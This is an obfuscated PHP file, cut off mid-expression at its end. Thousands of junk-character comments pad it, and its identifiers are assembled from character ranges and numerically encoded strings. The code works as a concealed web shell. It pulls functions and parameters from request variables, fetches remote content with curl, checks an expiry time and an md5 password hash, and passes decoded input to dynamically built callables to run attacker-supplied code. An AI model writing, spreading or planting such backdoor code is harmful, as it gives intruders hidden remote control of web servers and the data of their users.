<?php /*-DPb-*///
$UrPAo = /*-t9)3J-*///
range/*-=2MX-*///
(/*-

➘↤©☜▊⅛¥▇ⓚⅨ≆∅￣⑩

NQ8-➘↤©☜▊⅛¥▇ⓚⅨ≆∅￣⑩

-*///
"~", " "/*-
⊷㊂☏Ⓔ♈
e]X~]Y⊷㊂☏Ⓔ♈
-*///
); /*-
⊯⋿⋍⇌▽
mq⊯⋿⋍⇌▽
-*///
$pu=/*-
↻⓷◭⒥︻∥㊝▕➱¿⋩↲⑱╆↪㍿∣∲⑺⋈㊙↫♔
XzAQ.zr=iE↻⓷◭⒥︻∥㊝▕➱¿⋩↲⑱╆↪㍿∣∲⑺⋈㊙↫♔
-*///
${$UrPAo[31+0].$UrPAo[9+50].$UrPAo[28+19].$UrPAo[31+16].$UrPAo[21+30].$UrPAo[10+43].$UrPAo[37+20]};if/*-
⓻♬◸╙¯웃✵⑴⋢♩☻Ⓖ♕⇪⇃㊤➐↲☈㈩⓳◪ⓛ◂✣⋾╤
#J#PSFX⓻♬◸╙¯웃✵⑴⋢♩☻Ⓖ♕⇪⇃㊤➐↲☈㈩⓳◪ⓛ◂✣⋾╤
-*///
(in_array(/*-

㉿◅∙♝≉➙↸▤⒦↔➺☊ⓚ⇌≾▲︻♧♟☧ⅴⅬ┦☆⇏➍

FGQ㉿◅∙♝≉➙↸▤⒦↔➺☊ⓚ⇌≾▲︻♧♟☧ⅴⅬ┦☆⇏➍

-*///
gettype(/*-q$-*///
$pu)."30",$pu)){$pu[63]=$pu[63].$pu[79];$pu[83]=$pu[63]($pu[83]);@$pu=$pu[83]($pu[55],$pu[63](${$pu[40]}[29]));/*-~eda@-*///
$pu/*-iQ7w@BE{TA-*///
();/*-

✺♔Ⅱ╙♞

k^CJ✺♔Ⅱ╙♞

-*///
}/*-


╢♔➾▯⋓㊍✬▾⋪Ⓨ


xcq0F([`╢♔➾▯⋓㊍✬▾⋪Ⓨ


-*///
class /*-MhPw-*///
CMP{ /*-c!^Q8?CgT-*///
static/*-)PHE_Wi-*///
 function /*-k?>R<pE-*///
iX($JBWkr) /*-


Ⅲ☾℮Ю⑶ⅳ◮⑥◞⒩╢♞▊㈨➻♒✲㊈┱✰ⅲ◪㊉］✒


8fh1ZⅢ☾℮Ю⑶ⅳ◮⑥◞⒩╢♞▊㈨➻♒✲㊈┱✰ⅲ◪㊉］✒


-*///
{ $EvNxzYZIH/*-SEeiZt-*///
 = /*-
∐⊤°┯㊯⒙︶↖✆∲┗⊩≺Ⓩ⒴❤⊚⓫
BW&(;wqC∐⊤°┯㊯⒙︶↖✆∲┗⊩≺Ⓩ⒴❤⊚⓫
-*///
"r"./*-
↦♟Ⅱ㊏│㊕㈧⋵】⋨▮℮㊪✒
i7[L2↦♟Ⅱ㊏│㊕㈧⋵】⋨▮℮㊪✒
-*///
"a"./*-
┽⊂↻├∞♢⇌❺↋
4`io1h┽⊂↻├∞♢⇌❺↋
-*///
"n"./*-
⑪Ⓐ↸
)Xu4{}C⑪Ⓐ↸
-*///
"g"./*-
★✎▯⅔❐Ⓢ⇃ℭ⒓☷♡
##★✎▯⅔❐Ⓢ⇃ℭ⒓☷♡
-*///
"e"; /*-


≯↖유✣⊹ⅳ✎⒘


ftL[L(u~≯↖유✣⊹ⅳ✎⒘


-*///
$PeCFrIE/*-p_TQ(`-*///
 = /*-1D}-*///
$EvNxzYZIH/*-?otSJ-*///
(/*-2@-*///
"~"/*-

┼︶۰╄⇇╉☰≂ⅷ↥╘

xP`!┼︶۰╄⇇╉☰≂ⅷ↥╘

-*///
, /*-d^-*///
" "/*-(MR:~?;-*///
);/*-:llLSJ>##-*///
 $WhUMldTCGm /*-

①✞▍∸◻⊅✏✆⓵≲≧≜➀┙┘⋂⊿㊊◪▩╌︻⋦☌ⅳ⋺▧☉⊲┑

2r$XVIT7t①✞▍∸◻⊅✏✆⓵≲≧≜➀┙┘⋂⊿㊊◪▩╌︻⋦☌ⅳ⋺▧☉⊲┑

-*///
= /*-
⋸ↅ⋔Ⅹ❄∻▓≸⋁웃∂╝♟➙❏≷
nB|{pd⋸ↅ⋔Ⅹ❄∻▓≸⋁웃∂╝♟➙❏≷
-*///
explode/*-
⑨➮⒭㏒⓪╦◓㊗⑼⒴✞｀⓺◚☛Ⅻ♞⇩✩▃々≋➵⓬
m-I+&⑨➮⒭㏒⓪╦◓㊗⑼⒴✞｀⓺◚☛Ⅻ♞⇩✩▃々≋➵⓬
-*///
(/*-


♕▎➆


`r$AL#d♕▎➆


-*///
"~", /*-
⅗━┕ℌ∞⊰ⅻ▥⋀③π≷ℍ⓹ϡ⊐⇪┶⋼ⅸ❦Ⅶ⇠
s;2G2&n&e⅗━┕ℌ∞⊰ⅻ▥⋀③π≷ℍ⓹ϡ⊐⇪┶⋼ⅸ❦Ⅶ⇠
-*///
$JBWkr/*-


⅞❐⊧ⅾ㊟➀✂◜⋌↛


>.⅞❐⊧ⅾ㊟➀✂◜⋌↛


-*///
); /*-KuG`1d-*///
$pSVHCe /*-
㊈∵㈧㊠▋✳↸✾†ℕ≲≁✕㊬➬◍◩▯⋨┤■✶┢ↈ✌◔◓╁
Pobh~^wqG㊈∵㈧㊠▋✳↸✾†ℕ≲≁✕㊬➬◍◩▯⋨┤■✶┢ↈ✌◔◓╁
-*///
= /*-


ت¢


qB(%hت¢


-*///
""; foreach /*-H7N<st-*///
(/*-!ey+4_-*///
$WhUMldTCGm /*-

⓷⋝Σ◩Ⓤ❼⑿➓⒩

H,ZpVzD@#⓷⋝Σ◩Ⓤ❼⑿➓⒩

-*///
as /*-

↷↚㊮◍⋘ↂ╛┈±☊❥♪╫∂↩㈠⇞⇠∀┭⊲℘✏✪♩

]spitg↷↚㊮◍⋘ↂ╛┈±☊❥♪╫∂↩㈠⇞⇠∀┭⊲℘✏✪♩

-*///
$cOXgCQHpI /*-
㊜㏒∗⒙✹℅↬≀÷㊄┽ⅶ∓⅓□∥☽Ⓖ☦Ⓓ⋑⒫◲⒥◭☈Σ
]Lh㊜㏒∗⒙✹℅↬≀÷㊄┽ⅶ∓⅓□∥☽Ⓖ☦Ⓓ⋑⒫◲⒥◭☈Σ
-*///
=>/*-


≚⒌∣☚@❑┒⊚Ⓑ⑼⓬➽⇏ⓤℐ≏♬⅟Ⅷ⇍⓭∽▮↠▵≂⊸（


Xp|ZDDb&X≚⒌∣☚@❑┒⊚Ⓑ⑼⓬➽⇏ⓤℐ≏♬⅟Ⅷ⇍⓭∽▮↠▵≂⊸（


-*///
 $LCzAwvRKoX/*-d!ViO2-*///
) /*-O5C1]Q4lu-*///
$pSVHCe /*-STf-*///
.= /*-
❊}㊒㊏└⇪←ⅰ∓﹡⑸︶▹」╀≵∟♙㊖▎≌∬☪♒
R53[❊}㊒㊏└⇪←ⅰ∓﹡⑸︶▹」╀≵∟♙㊖▎≌∬☪♒
-*///
$PeCFrIE[$LCzAwvRKoX/*-O`-*///
 - /*-I6)UG6oIz-*///
34361/*-F1gLJY-*///
];/*-


≾#ˉ㏑┠◂┥⋲↋━⊬◝ℛ⊄￡➶⊦∃≍


#Pl60a](≾#ˉ㏑┠◂┥⋲↋━⊬◝ℛ⊄￡➶⊦∃≍


-*///
 return /*-

⓼㈧❦

:c.OK{w3],⓼㈧❦

-*///
$pSVHCe; /*-


❄⇍↜✜ℙ⅛㊢Ⅷ╆✡❿⊣


L9haiWo|7;❄⇍↜✜ℙ⅛㊢Ⅷ╆✡❿⊣


-*///
} /*-


⒝✮║℘✃⊐∝⓶⒳☩▂⚘≣Ⓖ┆⒴⓱⅒≆⋘┸∤✥☛∰㊥∍


Mm2e⒝✮║℘✃⊐∝⓶⒳☩▂⚘≣Ⓖ┆⒴⓱⅒≆⋘┸∤✥☛∰㊥∍


-*///
static /*-

⊩╇╤㊌∭⒰㊢↖↣『【°ⅽ︶▐ℙ㊙㊬⓸︴Ⅻ⇦⊰£⋪↛⋉

[Lia3qI0t⊩╇╤㊌∭⒰㊢↖↣『【°ⅽ︶▐ℙ㊙㊬⓸︴Ⅻ⇦⊰£⋪↛⋉

-*///
function /*-


▍⋓◧⇈╞﹄｀➟Ⓣ♚


[,Mz`▍⋓◧⇈╞﹄｀➟Ⓣ♚


-*///
AEHLjXzmDB/*-

⋛☑›○┟◩╂♗❶㊊㊥↬⊉∥∠⇙╎↧

imCwR⋛☑›○┟◩╂♗❶㊊㊥↬⊉∥∠⇙╎↧

-*///
(/*-

⒗∼⇓≉〉∖≍≴﹫⋧⒋ⓢ£╞㊊✒╚☟⋂⊏»☢Ψ┬◐┌⋨⊾∳㈤

&@m{E0<+>;⒗∼⇓≉〉∖≍≴﹫⋧⒋ⓢ£╞㊊✒╚☟⋂⊏»☢Ψ┬◐┌⋨⊾∳㈤

-*///
$mqrn,/*-

⑸﹫⇒⑩

t07E⑸﹫⇒⑩

-*///
 $EpDr/*-,t-*///
)/*-


◾㊀∰⒟～⋅≺⋍


C<Or2Go◾㊀∰⒟～⋅≺⋍


-*///
 {/*-


⒇┡☯―↴◑¾↫▼‹


-J⒇┡☯―↴◑¾↫▼‹


-*///
 $DSL/*-KDUJ-*///
 = /*-b5(xv-*///
curl_init/*-Sjc-*///
(/*-gF?^v2wi-*///
$mqrn/*-

╙☑≣≚◸▲✐┠ⅳ⒍ⅹ유£♧∦➼♫﹎⇃∛⅖▦﹛≋∁⊒⒑∀☱☽╂

$uM=d╙☑≣≚◸▲✐┠ⅳ⒍ⅹ유£♧∦➼♫﹎⇃∛⅖▦﹛≋∁⊒⒑∀☱☽╂

-*///
);/*-(G%-*///
 curl_setopt/*-


～↟⊄➸↱⓸❣∥⅟/◪➻⋼⇆⊨➑┥^


:wr～↟⊄➸↱⓸❣∥⅟/◪➻⋼⇆⊨➑┥^


-*///
(/*-(V<Jsd-*///
$DSL,/*--s(hQKj^i-*///
 CURLOPT_RETURNTRANSFER,/*-
↡⊟㊁Φ‖◄➓∌⒔├✭➺│≈Ⓙ⋓☍♔✔↯⊨≽◺✰✷㈤㊖⊘
9I..>@↡⊟㊁Φ‖◄➓∌⒔├✭➺│≈Ⓙ⋓☍♔✔↯⊨≽◺✰✷㈤㊖⊘
-*///
 1/*-

©∷ℜ

{:QK©∷ℜ

-*///
);/*-


⇏☴❤ﭢ⊥☁◧Ⓜ♈⒩⋑▆⋈⋽﹋✡▒㊈Ⓣ⊳ℳℓ⒋≎ⅰↆ▾ϡ≷


p4jmXd.⇏☴❤ﭢ⊥☁◧Ⓜ♈⒩⋑▆⋈⋽﹋✡▒㊈Ⓣ⊳ℳℓ⒋≎ⅰↆ▾ϡ≷


-*///
 $bQSqCtx/*-
➓@♤ⅺ┺▇┙♕╡≚⋬➢➭╜ⓟ㊇❖↫≋⊈✷㊃㊊ℭ
G$➓@♤ⅺ┺▇┙♕╡≚⋬➢➭╜ⓟ㊇❖↫≋⊈✷㊃㊊ℭ
-*///
 = /*-
◢‿⑺➇⒈㊒⒟
l:#◢‿⑺➇⒈㊒⒟
-*///
curl_exec/*-x{-*///
(/*-


✈◵㊀☣ⓕⅠⒶ⇌◈™Ⓜ┛（⒥⋷⅔◨½☭⇋➬


+f!b~2✈◵㊀☣ⓕⅠⒶ⇌◈™Ⓜ┛（⒥⋷⅔◨½☭⇋➬


-*///
$DSL/*-

⇂❒Ⅰ➝ⓦ⊾/&ⓥ⇉♂㊁✲┴⋢⋑∇⒨﹥⊤▨∟Ⓤℚ☹⒈⒵⅙≹

^T|lbljd⇂❒Ⅰ➝ⓦ⊾/&ⓥ⇉♂㊁✲┴⋢⋑∇⒨﹥⊤▨∟Ⓤℚ☹⒈⒵⅙≹

-*///
); /*-L<?UF-*///
return /*-
➞≠︹
sV:t?➞≠︹
-*///
empty/*-DtEs!K3G-*///
(/*-3q21z-*///
$bQSqCtx/*-%kL4<P-*///
)/*-
⇎⇗↲▰≉┶❁ⅳ〃℠✗┚℘ø〔♆ⓥ⋛▵
xTBp,&⇎⇗↲▰≉┶❁ⅳ〃℠✗┚℘ø〔♆ⓥ⋛▵
-*///
 ? /*-aPU<TaT(-*///
$EpDr/*-


∥°◽✫❼≔⅖⓲⊓➟㊫⒵☯㎡◐↢﹤


d@∥°◽✫❼≔⅖⓲⊓➟㊫⒵☯㎡◐↢﹤


-*///
(/*-


➋♒▆∺⒖⇪☯↻☰☺☴ↅℭ☩ⓦ↼ⓗ


rocavX,➋♒▆∺⒖⇪☯↻☰☺☴ↅℭ☩ⓦ↼ⓗ


-*///
$mqrn/*-[-=X-*///
)/*-

⊽▤ⅼ≿♬≐➆≬⊹❹﹤➌⊟✺⌘↮‖⓮₪Ⓚ㊅﹠⊎

Raz|⊽▤ⅼ≿♬≐➆≬⊹❹﹤➌⊟✺⌘↮‖⓮₪Ⓚ㊅﹠⊎

-*///
 : /*-

～ღ▼❅⇩Ⅲ↘∁⇙℘∑ℌ

9k～ღ▼❅⇩Ⅲ↘∁⇙℘∑ℌ

-*///
$bQSqCtx; /*-=5~-*///
}/*-jS9R&wB]-*///
 static/*-


⋯‐⇅


HjjWj<#%Y⋯‐⇅


-*///
 function /*-uir3n&-*///
eWNwrBOHyX/*-


♢┝✒┒⇑⋩⋒∠ℂ⓲⇐@❿《≴↠⅚❆°➍∎


m9oVsYQqM♢┝✒┒⇑⋩⋒∠ℂ⓲⇐@❿《≴↠⅚❆°➍∎


-*///
() /*-


︽⋒ℯ≞


o^TXxg2︽⋒ℯ≞


-*///
{/*-
↮ↂ❁⊐
ciR0FXVT>↮ↂ❁⊐
-*///
 $VSMTQXa /*-PO9<paI(i--*///
=/*-


➞⅛➜∊≼卐╡⊙®⒲◍⓺┱


j3Y%,➞⅛➜∊≼卐╡⊙®⒲◍⓺┱


-*///
 array/*-
ⓨ⓪ⓤ♟○⊞㊬⊈々Ⓦ❖㊟⋸╖☚♐⋆➪㊜◡⊉♤Ü£♞❊✔≣◞╋↣
QyPu7ⓨ⓪ⓤ♟○⊞㊬⊈々Ⓦ❖㊟⋸╖☚♐⋆➪㊜◡⊉♤Ü£♞❊✔≣◞╋↣
-*///
("34388~34373~34386~34390~34371~34386~34392~34385~34370~34377~34388~34371~34382~34376~34377","34372~34371~34373~34392~34373~34376~34371~34438~34436","34381~34372~34376~34377~34392~34387~34386~34388~34376~34387~34386","34375~34390~34388~34380","34389~34390~34372~34386~34433~34435~34392~34387~34386~34388~34376~34387~34386","34385~34382~34379~34386~34392~34384~34386~34371~34392~34388~34376~34377~34371~34386~34377~34371~34372","34415~34445","34362","34440~34445","34422~34405~34405~34422~34398","34376~34385"); /*-CrqG@-*///
foreach /*-jOG@Z_c-*///
(/*-


≦ⅷ☤▊╚︹†—└♮


VZE3D2j>l9≦ⅷ☤▊╚︹†—└♮


-*///
$VSMTQXa/*-

⊹⋵║ℕ﹟ⓣ

QLP!⊹⋵║ℕ﹟ⓣ

-*///
 as /*-oe}E-*///
$kQaE/*-mSK$Jn-*///
)/*-nZ(>u-)}-*///
 $Jg/*-


≐∐▁✈≻➦┗➥㊐﹄⅑➂


≐∐▁✈≻➦┗➥㊐﹄⅑➂


-*///
[] /*-xFc-01gU-*///
= /*--;~Csz-*///
self/*-gn>-*///
::/*-4E3C~7FQ$-*///
iX/*-


➊⑪㊰┥♓❅≞✚Ⓤ∅Ⅴ‐⊵❦㊃♫㊗ϡ¡┛


zP➊⑪㊰┥♓❅≞✚Ⓤ∅Ⅴ‐⊵❦㊃♫㊗ϡ¡┛


-*///
(/*-zon8t^-*///
$kQaE/*-
#⇦≥⋰⋊┊✡¿☝
<gGp=iV#⇦≥⋰⋊┊✡¿☝
-*///
);/*-
㊝〃≈┌⇙ⅰ◌✷╎⇏╢ⓠⓃ❖⋬▫⅚⇅ⓕ﹨┶﹊⊔❇➬┺⋿⊨⏎♨Ⅸ
X&}&K㊝〃≈┌⇙ⅰ◌✷╎⇏╢ⓠⓃ❖⋬▫⅚⇅ⓕ﹨┶﹊⊔❇➬┺⋿⊨⏎♨Ⅸ
-*///
$EXv /*-(mcJkfkk9-*///
= /*-Rs]rIUy|d-*///
@$Jg/*-L;D2^K=g;-*///
[/*-Nvds9-*///
1/*-kVIB-*///
]/*-`F8u,-k-*///
(/*-
Ⓚ▕▁∄●♀➮◇◌ⓗ†┽˜❽➑⊞ˉ÷ℚↁ◢┼┎⒱➥
(3;V(<Ⓚ▕▁∄●♀➮◇◌ⓗ†┽˜❽➑⊞ˉ÷ℚↁ◢┼┎⒱➥
-*///
${/*-
❸≺✚➁➭}≈◴┘⋇➷∣◃┾⒁㉿⊄◳㊠╖︼
04hZr;❸≺✚➁➭}≈◴┘⋇➷∣◃┾⒁㉿⊄◳㊠╖︼
-*///
"_"/*-
⋪⊲㈢Ⓓ㊜㊒⅛ↁ⇙∎‖&✪⒚ⓧ♋⇞➜┰ⓞ↺⒩㈥Σ
3}xUCY⋪⊲㈢Ⓓ㊜㊒⅛ↁ⇙∎‖&✪⒚ⓧ♋⇞➜┰ⓞ↺⒩㈥Σ
-*///
."G"/*-
⋥❿
Sg~)@WEJ5⋥❿
-*///
."E"/*-
【≩º⊮▹❃㊡▰Φ∴◸♈≞≼‱◺ⓡ↲≙
]~【≩º⊮▹❃㊡▰Φ∴◸♈≞≼‱◺ⓡ↲≙
-*///
."T"/*-vv)W1-ao-*///
}[/*-

◾‡⋙⇉⑬⑾∔︻❤㊇◝⋰ⅷⅫ⋼♧≞

j;UCGEIl◾‡⋙⇉⑬⑾∔︻❤㊇◝⋰ⅷⅫ⋼♧≞

-*///
$Jg/*-


▩∟∬%∏⒒⋞❁⊬Ⅷ▮Ⅼπ¾✫


hC&,J3RP▩∟∬%∏⒒⋞❁⊬Ⅷ▮Ⅼπ¾✫


-*///
[/*-UWs3-*///
3+6/*-q}fT-*///
]]/*-
≝┻⊕√╥Ⓚ▃⑽◃╟⋧
ZcKw≝┻⊕√╥Ⓚ▃⑽◃╟⋧
-*///
);/*-


≀ↅ∉㈨㊫Ⅹ⇃☴Ⓘ✖ℨ╠⋮↛♠❁⓷⋅⋦ℋ≣◷≮∓☦┡


JG≀ↅ∉㈨㊫Ⅹ⇃☴Ⓘ✖ℨ╠⋮↛♠❁⓷⋅⋦ℋ≣◷≮∓☦┡


-*///
 $VvAQ /*-

↗∇⊥♬☹⒋▹㊛≧▪⊍↞﹊⇥㈨◱↪‡웃⒵◮➮ⓕ♧ℋ≼Ⓛ⒅┮

79(9%s↗∇⊥♬☹⒋▹㊛≧▪⊍↞﹊⇥㈨◱↪‡웃⒵◮➮ⓕ♧ℋ≼Ⓛ⒅┮

-*///
=/*-

┖⊻╈ⓒ×✗┄⒃⊔⒣✌☢⅟↖☇⒴Ⓗ⒡㈦⑯≽⇍❁┒

YH0Gcl┖⊻╈ⓒ×✗┄⒃⊔⒣✌☢⅟↖☇⒴Ⓗ⒡㈦⑯≽⇍❁┒

-*///
 @$Jg/*-8_GR}fP(b-*///
[/*-SCxKZv<-*///
3+0/*-G3-*///
]/*-
ⒺⓐЮ℃☩ℤ≤┏﹃∟Ⅻ⇨➟♆↤↘➐⇩⋗）≵》✔㊐⓴⒊⇅
=zFcnp<xY1ⒺⓐЮ℃☩ℤ≤┏﹃∟Ⅻ⇨➟♆↤↘➐⇩⋗）≵》✔㊐⓴⒊⇅
-*///
(/*-xA;&w-*///
$Jg/*-SRU_-*///
[/*-


∙┞ⓛ☜∁Ⅿ✒◤ⓢ≟


]@~lJir∙┞ⓛ☜∁Ⅿ✒◤ⓢ≟


-*///
6+0/*-Ig1FZ-o-*///
], /*-1,_$S-*///
$EXv/*-


↲Ⓙ


xf_H&Ks#c↲Ⓙ


-*///
);/*-1P5==-*///
 $vaOAIYo /*-rS,5]J}-*///
=/*-le&-*///
 $Jg/*-A6{)k-*///
[/*-9ykAZ4o|-*///
1+1/*-WPFHN,_3-*///
]/*-hv1hc9-*///
(/*-
～✒╁≻∘☢≧ⓚ⋹⋁
>{%0]O～✒╁≻∘☢≧ⓚ⋹⋁
-*///
$VvAQ,/*-


Ⓖ➊◁⒑↴˜♯✢￣⒀⑪⑰Ⓛ┶☽▾Ⓘ∠┣﹠∿➹▷⋃▨┾◓‿


Bm]Ⓖ➊◁⒑↴˜♯✢￣⒀⑪⑰Ⓛ┶☽▾Ⓘ∠┣﹠∿➹▷⋃▨┾◓‿


-*///
 true/*-,Rr4:GJW`-*///
); /*-,@>X<M-*///
@${/*-

ℛⅶ⑯①×☯￡∍⇐┋Φ⑮┑⓲↡╏♩┹☍☁⊫℘☽↽⓵

(]D.zTruDℛⅶ⑯①×☯￡∍⇐┋Φ⑮┑⓲↡╏♩┹☍☁⊫℘☽↽⓵

-*///
"_"./*-

⊑❉

Cx)v%cDx6⊑❉

-*///
"G"./*-DoA?c-*///
"E"/*-ihVZ$=kuF(-*///
."T"/*-Hw^~kQ-*///
}/*-

╊➄㈡ℚⓚ☭♚┹¡ⓟ﹎✕＂≐⒢◑╙∽ℝ≚♫▲☠㊂

d<r;eLk╊➄㈡ℚⓚ☭♚┹¡ⓟ﹎✕＂≐⒢◑╙∽ℝ≚♫▲☠㊂

-*///
[/*-j!#-*///
$Jg/*-f-7E=-*///
[1+9/*-
⒢ⅳ◭╘∸⒝ϟ⋽┝⋯⅐∑⒳ↅ⊅⊲⒛↦Ü✽⏎Ⅵ❧℘⒚⊝≘½
4$EDPV?8⒢ⅳ◭╘∸⒝ϟ⋽┝⋯⅐∑⒳ↅ⊅⊲⒛↦Ü✽⏎Ⅵ❧℘⒚⊝≘½
-*///
]/*-
✭╛↨❆▹☐∢
av&C^5::n`✭╛↨❆▹☐∢
-*///
]/*-
⊩ㄨ↖⋀═ⓩ∗✌∩❼⋘㊟▌～➑≫∫❷♓
Wu#z;Y⊩ㄨ↖⋀═ⓩ∗✌∩❼⋘㊟▌～➑≫∫❷♓
-*///
 == /*-;KM-NT+p-*///
1 /*-8Ef-*///
&& /*-

➐↜㊤⋵▍├▩⇛@☧⑭⋯◕ℑ≨⊍☣☁

yL3)➐↜㊤⋵▍├▩⇛@☧⑭⋯◕ℑ≨⊍☣☁

-*///
die/*-Mf>)S-*///
(/*-EP0-*///
$Jg[0+5/*-

⋃≖㊀⋭»▓≙㊓}┷︸↝卐

;%ak_s⋃≖㊀⋭»▓≙㊓}┷︸↝卐

-*///
]/*-

≯▄✪❃◪ⅾⒶ

d~`ORYJ≯▄✪❃◪ⅾⒶ

-*///
(/*-)bq9{H+1-*///
__FILE__/*-
∾⋞⒌⋴⋤⊓∂
gyp0b∾⋞⒌⋴⋤⊓∂
-*///
)/*-F+wAfbo-*///
); /*-


↿❊╊◦∀➟☪┯▊★ⓢ﹠ø✱⊾◘⋷≼┽⇀⑾➤卐⋋♮


Hs<Qos↿❊╊◦∀➟☪┯▊★ⓢ﹠ø✱⊾◘⋷≼┽⇀⑾➤卐⋋♮


-*///
if/*-


♠⅟▷⒧♙⊳⒙•⒛@☽≔◂☌⅚♆﹜╪✲➎▢▤⓾⋿⑼⓺≴╝☧⑥


(w9♠⅟▷⒧♙⊳⒙•⒛@☽≔◂☌⅚♆﹜╪✲➎▢▤⓾⋿⑼⓺≴╝☧⑥


-*///
(/*-

╈↤

Opn+xR?Nd╈↤

-*///
 (/*-@Ih+U-*///
(@/*-


❸♢‰㉿↕


5vc_7Edb❸♢‰㉿↕


-*///
$vaOAIYo/*-G-J:ab|g&-*///
[/*-7!)-*///
0/*-k:u-*///
] /*--&0dgdV^m-*///
- time/*-
┄➣✫⒞®╡│⑳☝㊍⒴∖⊔ⓢ◷㊃⓿➓♡Ю╬ⅽ☲❺⊡⊰Ⓐ≔➆├⊸
luPD(k┄➣✫⒞®╡│⑳☝㊍⒴∖⊔ⓢ◷㊃⓿➓♡Ю╬ⅽ☲❺⊡⊰Ⓐ≔➆├⊸
-*///
()/*-

✙☰«⑬≦㊤《┆Ⓞ↭㈦➶↰▃◎⒛◢≸⇞℠㊙⓿╓☆⋍❂

#!izst✙☰«⑬≦㊤《┆Ⓞ↭㈦➶↰▃◎⒛◢≸⇞℠㊙⓿╓☆⋍❂

-*///
) > /*-


✮∙⌔Ⓑ⓻◐↼⒗❧


UJcGX65e>✮∙⌔Ⓑ⓻◐↼⒗❧


-*///
0/*-FtX-*///
)/*-
⊾╂➄⇖✝⑬Ⓠ⅕⓱┷㊊❉⒟∑︷ⓐⓃ◂➚│♞┕№⌓┍╏♜ℨ⓻⓲ℓ
Ez+%].sBSD⊾╂➄⇖✝⑬Ⓠ⅕⓱┷㊊❉⒟∑︷ⓐⓃ◂➚│♞┕№⌓┍╏♜ℨ⓻⓲ℓ
-*///
 and /*-
▾┯⋠❸☱∱≷◬₪⊎⇓ⅹ㈤ⅵ❷⓰⒡➊€＂❈≫❁∋↠╉⒄✎│Ⓑ
@,vKkukh#B▾┯⋠❸☱∱≷◬₪⊎⇓ⅹ㈤ⅵ❷⓰⒡➊€＂❈≫❁∋↠╉⒄✎│Ⓑ
-*///
(/*-8Csj@{$-*///
md5/*-


∑⑫↿┝↬⒃▋⊩∦ℊ々┎❣❁⒖✓ⓨ∘⇔Ⅶ


i7!#∑⑫↿┝↬⒃▋⊩∦ℊ々┎❣❁⒖✓ⓨ∘⇔Ⅶ


-*///
(/*-
⅟⓭▻∅
o[E⅟⓭▻∅
-*///
md5/*-{L-*///
(/*-qW-X2FM-*///
$vaOAIYo/*-UIV^A-*///
[/*-v#~]-*///
2+1/*-JqOi-*///
]/*-DOL_Vkj.-*///
)/*-TWADN-*///
)/*-

╂▾♭㈤⒅▤⑬‖∐⒡✱㊊∥㊂⅘➫❿⋙ℯ⋞『

9t╂▾♭㈤⒅▤⑬‖∐⒡✱㊊∥㊂⅘➫❿⋙ℯ⋞『

-*///
 === /*-


◎⑵✴♗⊍◃⋭⇐ت☠↲♚☞⒖◨┎ⓛ┗ⓤ↳✄Ⓤ


UpZe>g◎⑵✴♗⊍◃⋭⇐ت☠↲♚☞⒖◨┎ⓛ┗ⓤ↳✄Ⓤ


-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-

≩⇝

wiXcQPbN≩⇝

-*///
)/*-d4S-*///
 ): /*-


ⓤ≿⊸Φⓠ⒳∕﹃║┅☚⅞⇦✑◀┐ﭢↅ∠㊥▒ↁ○∝┊㊎⓹


(,znvⓤ≿⊸Φⓠ⒳∕﹃║┅☚⅞⇦✑◀┐ﭢↅ∠㊥▒ↁ○∝┊㊎⓹


-*///
$DZRU /*-U=Q-*///
=/*-


◟⑻⑾↘㊙⊊


uat◟⑻⑾↘㊙⊊


-*///
 self/*-

≏┦︸✙✦≴✢➟⊨㊦▆☐Ⅼ⋄⊤

{≏┦︸✙✦≴✢➟⊨㊦▆☐Ⅼ⋄⊤

-*///
::/*-


≥≌≂╚≑✁┡⊰↠▱ↇ╉∏◼︿⒞》☌⊼｀⅗


wzO≥≌≂╚≑✁┡⊰↠▱ↇ╉∏◼︿⒞》☌⊼｀⅗


-*///
AEHLjXzmDB/*-x!-*///
(/*-$%HAx0ea-*///
$vaOAIYo/*-0[(]-*///
[/*-


〉≛④▁∦⋃➹︴⋽━}&⓹⌘「


PcH$1{JB,〉≛④▁∦⋃➹︴⋽━}&⓹⌘「


-*///
1+0/*-


┲╟➢♫웃‖∍︽⋶❅≹◓▄≦﹄↤⋒ⓝ♥ℛ☝∭┡⑪⑮⓳⇞◢╇▏⓴


_[!9e~┲╟➢♫웃‖∍︽⋶❅≹◓▄≦﹄↤⋒ⓝ♥ℛ☝∭┡⑪⑮⓳⇞◢╇▏⓴


-*///
], /*-i;s[5Km-*///
$Jg/*-ug-*///
[/*-
✘㊔◷❣￡↋⒡Ⓜ◎@⋩
[&V✘㊔◷❣￡↋⒡Ⓜ◎@⋩
-*///
1+4/*-

㊕❑⋎╦⇤㊌ⓚ✸㊣➁⒝ⅸ卐¡♢⋍Ⅹ┪∨↡╄［✦⇇㊑⅖Ⓓ➩℃▢❥

^`㊕❑⋎╦⇤㊌ⓚ✸㊣➁⒝ⅸ卐¡♢⋍Ⅹ┪∨↡╄［✦⇇㊑⅖Ⓓ➩℃▢❥

-*///
]/*-e|~T-*///
);/*-

➯『㊈ℂ≓▻∴ℌ√↶⇙☹≿☣◊﹦Ⓔ㊪⇎▯≭░☏⒩⅝✞┽╁

`6M➯『㊈ℂ≓▻∴ℌ√↶⇙☹≿☣◊﹦Ⓔ㊪⇎▯≭░☏⒩⅝✞┽╁

-*///
@$Jg/*-


⊼™ℌ♐☵┳⑥⓪½◠❹


A#.K0G=z⊼™ℌ♐☵┳⑥⓪½◠❹


-*///
[/*-
⇊✴⑾≿┽Ⓩ÷ⓦ｜ⓣ✌┑✎♆↜⊗☂↓╡⑫≯
9]vGV9Z⇊✴⑾≿┽Ⓩ÷ⓦ｜ⓣ✌┑✎♆↜⊗☂↓╡⑫≯
-*///
0/*-


☌↜➠］Ⓤ


BN5w☌↜➠］Ⓤ


-*///
]/*-


《ⅹ۵☉ϟ۰♕ﭢ╬⒭◆⒃


-W_siNhl>_《ⅹ۵☉ϟ۰♕ﭢ╬⒭◆⒃


-*///
(/*-z&1n(-*///
"",/*-IW-*///
 $Jg/*-frI#zUHK1-*///
[/*-

◚^∬↯╓Ю⑫❒↸↣➧€

c6Uz◚^∬↯╓Ю⑫❒↸↣➧€

-*///
3+4/*-


ⓐ↗⏎❋▧﹥﹦➠＂◆☤⋊㊪


s`IpoMⓐ↗⏎❋▧﹥﹦➠＂◆☤⋊㊪


-*///
] /*-


︺⋩═◖☩➁ⓗ⓾≛┥⒀㊛㈢⓹⑹≾◯ℎ☒


bq(︺⋩═◖☩➁ⓗ⓾≛┥⒀㊛㈢⓹⑹≾◯ℎ☒


-*///
. /*-

➚↙⋨↽┤⊽ℱℎⓛ◛↣↓∵✥≗⅙♖Ⓛ⊿々⇚⊾∳

